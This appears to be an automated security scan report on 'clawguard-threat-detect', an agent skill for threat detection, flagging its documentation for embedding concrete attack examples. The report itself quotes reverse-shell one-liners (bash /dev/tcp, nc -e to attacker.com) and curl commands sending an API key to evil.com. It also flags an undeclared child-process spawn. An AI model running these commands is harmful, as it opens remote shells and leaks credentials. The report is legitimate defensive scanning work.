clawguard-threat-detect Security Report — High Risk | ClawSafe

75 /100

clawguard-threat-detect

ClawGuard Threat Detector - Real-time behavioral monitoring and threat detection for OpenClaw

Security tool that documents actual attack payloads (reverse shells, credential exfiltration) as detection examples, creating a doc-to-code mismatch where the documentation itself serves as an attack template library.

Skill Nameclawguard-threat-detect

Duration55.5s

Enginepi

⛔

Do not install this skill

Do not use. The SKILL.md contains hardcoded malicious patterns presented as 'examples to block' that could serve as attack templates. Remove all actual payload examples and replace with generic descriptions only.

Attack Chain 4 steps

⬡

Escalation Skill presents as legitimate threat detector

SKILL.md:1

⬡

Escalation User reads SKILL.md and learns attack patterns

SKILL.md:34

⬡

Escalation User copies documented payloads as templates

SKILL.md:34

⬡

Escalation cli.js spawns child process with unvalidated input

cli.js:42

Findings 5 items

Severity	Finding	Location
Critical	Hardcoded Reverse Shell Payloads in Documentation Doc Mismatch SKILL.md:34 contains actual reverse shell commands (nc -e, /dev/tcp/, bash -i >&) presented as 'examples of what to detect'. These are functional attack templates, not generic descriptions. `bash -i >& /dev/tcp/10.0.0.1/4444 0>&1, nc -e /bin/bash attacker.com` → Remove all actual payload examples. Replace with generic pattern descriptions like 'reverse shell using file descriptor redirection' without concrete commands.	`SKILL.md:34`
Critical	Credential Exfiltration URLs Documented Doc Mismatch SKILL.md and cli.js contain examples of credential exfiltration using curl with API tokens sent to evil.com. These are functional attack templates. `curl http://evil.com/exfil?token=$API_KEY` → Remove all C2 infrastructure examples. Describe attack patterns generically.	`SKILL.md:83`
High	Full Reverse Shell Example in CLI Doc Mismatch cli.js:101 includes a complete reverse shell payload as a CLI example, normalizing dangerous attack techniques. `bash -i >& /dev/tcp/10.0.0.1/4444 0>&1` → Remove all concrete attack payloads from CLI examples.	`cli.js:101`
High	Undeclared Child Process Spawn with Unvalidated Input RCE cli.js:42-50 uses spawn() to invoke a 'self-improving-safety' module with piped stdin containing unvalidated alert data. This is not declared in SKILL.md. `spawn(process.execPath, [safetyCliPath, 'learn'], { stdio: ['pipe', 'inherit', 'inherit'] })` → Declare shell:WRITE capability or refactor to avoid child process execution. Validate and sanitize all data before piping to child processes.	`cli.js:42`
High	Comprehensive Attack Template Library Doc Mismatch SKILL.md contains a full MITRE ATT&CK coverage matrix with concrete examples of T1059 (Command/Script), T1041 (Exfiltration), T1059.004 (Bash Reverse Shell), providing a complete attack playbook. `Full detection patterns with actual payload examples` → Simplify documentation to describe detection capabilities without embedding actual exploit code.	`SKILL.md:34`

Resource	Declared	Inferred	Status	Evidence
Filesystem	`NONE`	`READ`	✓ Aligned	src/detector.js:8 - uses fs module for file monitoring
Shell	`NONE`	`WRITE`	✗ Violation	cli.js:42-50 - spawns child process with piped stdin
Network	`NONE`	`READ`	✓ Aligned	src/detector.js - analyzes network patterns for URLs
Environment	`NONE`	`READ`	✓ Aligned	cli.js:101 - references $API_KEY from environment

3 Critical 7 findings

💀

Critical Dangerous Command 危险 Shell 命令

nc -e

SKILL.md:34

💀

Critical Dangerous Command 危险 Shell 命令

/dev/tcp/

SKILL.md:34

💀

Critical Dangerous Command 危险 Shell 命令

bash -i >&

cli.js:101

🔗

Medium External URL 外部 URL

http://evil.com/exfil

SKILL.md:83

🔗

Medium External URL 外部 URL

http://evil.com

SKILL.md:462

🔗

Medium External URL 外部 URL

http://evil.com/exfil?token=$API_KEY

SKILL.md:601

🔗

Medium External URL 外部 URL

http://evil.com?token=$API_KEY

cli.js:67

File Tree

6 files · 44.5 KB · 1508 lines

Markdown 2f · 881L JavaScript 2f · 606L JSON 2f · 21L

├─ ▾ 📁 src

│ └─ 📜 detector.js JavaScript 503L · 14.3 KB

├─ 📋 _meta.json JSON 7L · 159 B

├─ 📜 cli.js JavaScript 103L · 3.2 KB

├─ 📋 package.json JSON 14L · 398 B

├─ 📝 README.md Markdown 138L · 4.1 KB

└─ 📝 SKILL.md Markdown 743L · 22.4 KB

Dependencies 1 items

Package	Version	Source	Known Vulns	Notes
`none`	`N/A`	npm	No	No external dependencies in package.json

Security Positives

✓ No actual credential harvesting code (patterns are in documentation, not executed)

✓ No direct C2 communication in actual code (only documented examples)

✓ No supply chain risks (package.json has no external dependencies)

✓ Threat detection logic is legitimate pattern matching

Scan Report

Attack Chain 4 steps

Findings 5 items

File Tree

Dependencies 1 items

Security Positives